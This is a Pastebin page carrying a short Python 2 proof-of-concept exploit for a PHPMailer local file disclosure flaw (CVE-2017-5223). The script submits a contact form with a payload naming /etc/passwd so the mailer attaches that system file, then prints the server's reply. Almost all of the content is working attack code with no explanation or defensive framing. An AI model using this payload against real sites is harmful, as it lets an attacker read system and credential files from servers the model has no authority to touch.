Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- import urllib
- import urllib2
- poc = """
- # Exploit Title: PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223)
- """
- url = 'http://localhost/contact.php'
- email = 'attacker@localhost'
- payload = '<img src="/etc/passwd"'
- values = {'action': 'send', 'your-name': 'Attacker', 'your-email': email, 'cc': 'yes', 'your-message': payload}
- data = urllib.urlencode(values)
- req = urllib2.Request(url, data)
- response = urllib2.urlopen(req)
- html = response.read()
- print html
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement